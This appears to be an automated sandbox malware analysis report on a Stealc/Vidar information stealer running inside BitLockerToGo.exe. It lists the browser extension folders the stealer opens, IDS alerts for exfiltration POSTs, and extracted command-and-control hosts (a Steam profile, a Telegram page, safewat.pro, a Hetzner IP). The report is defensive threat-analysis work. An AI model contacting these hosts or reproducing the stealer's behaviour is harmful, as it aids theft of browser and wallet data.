              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00411BD2 wsprintfA,FindFirstFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,4_2_00411BD2
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00411722 SymMatchString,SymMatchString,SymMatchString,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,4_2_00411722
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
              Source: chrome.exeMemory has grown: Private usage: 1MB later: 40MB

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.4:49740 -> 5.75.215.154:443
              Source: Network trafficSuricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.4:49739 -> 5.75.215.154:443
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49744 -> 5.75.215.154:443
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49743 -> 5.75.215.154:443
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56057 -> 5.75.215.154:443
              Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:56057 -> 5.75.215.154:443
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56059 -> 5.75.215.154:443
              Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:56059 -> 5.75.215.154:443
              Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 5.75.215.154:443 -> 192.168.2.4:49742
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56058 -> 5.75.215.154:443
              Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:56058 -> 5.75.215.154:443
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56060 -> 5.75.215.154:443
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56065 -> 5.75.215.154:443
              Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:56065 -> 5.75.215.154:443
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56063 -> 5.75.215.154:443
              Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:56063 -> 5.75.215.154:443
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56076 -> 5.75.215.154:443
              Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:56076 -> 5.75.215.154:443
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56062 -> 5.75.215.154:443
              Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:56062 -> 5.75.215.154:443
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56056 -> 5.75.215.154:443
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56089 -> 5.75.215.154:443
              Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:56089 -> 5.75.215.154:443
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56061 -> 5.75.215.154:443
              Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:56061 -> 5.75.215.154:443
              Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 5.75.215.154:443 -> 192.168.2.4:49741
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56212 -> 5.75.215.154:443
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56234 -> 5.75.215.154:443
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56226 -> 5.75.215.154:443
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56219 -> 5.75.215.154:443
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56242 -> 5.75.215.154:443
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56256 -> 5.75.215.154:443
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56263 -> 5.75.215.154:443
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56294 -> 5.75.215.154:443
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56286 -> 5.75.215.154:443
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56248 -> 5.75.215.154:443
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56267 -> 5.75.215.154:443
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56301 -> 5.75.215.154:443
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56311 -> 5.75.215.154:443
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56202 -> 5.75.215.154:443
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56277 -> 5.75.215.154:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199824159981
              Source: global trafficTCP traffic: 192.168.2.4:56040 -> 162.159.36.2:53
              Source: global trafficHTTP traffic detected: GET /sok33tn HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
              Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
              Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
              Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
              Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00403C79 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,4_2_00403C79
              Source: global trafficHTTP traffic detected: GET /sok33tn HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: safewat.proConnection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: chrome.exe, 00000005.00000002.2175249159.00006D8C004B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
              Source: chrome.exe, 00000005.00000002.2175249159.00006D8C004B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
              Source: chrome.exe, 00000005.00000003.2100043863.00006D8C00FD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2100474735.00006D8C0040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2099875759.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
              Source: chrome.exe, 00000005.00000003.2100043863.00006D8C00FD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2100474735.00006D8C0040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2099875759.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
              Source: chrome.exe, 00000005.00000002.2175249159.00006D8C004B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
              Source: chrome.exe, 00000005.00000002.2175249159.00006D8C004B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
              Source: chrome.exe, 00000005.00000002.2174798561.00006D8C002D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
              Source: global trafficDNS traffic detected: DNS query: t.me
              Source: global trafficDNS traffic detected: DNS query: safewat.pro
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: apis.google.com
              Source: global trafficDNS traffic detected: DNS query: play.google.com
              Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----v37ycbaai58qimg479hvUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: safewat.proContent-Length: 256Connection: Keep-AliveCache-Control: no-cache
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2176048173.00006D8C006E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136
              Source: chrome.exe, 00000005.00000002.2176048173.00006D8C006E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136m
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2162
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2517
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2175324093.00006D8C004BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2970
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3078
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2175324093.00006D8C004BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3205
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3206
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3452
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2175324093.00006D8C004BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3498
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3502
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3577
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3584
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2175324093.00006D8C004BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3586
              Source: chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180202104.00006D8C00C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3623
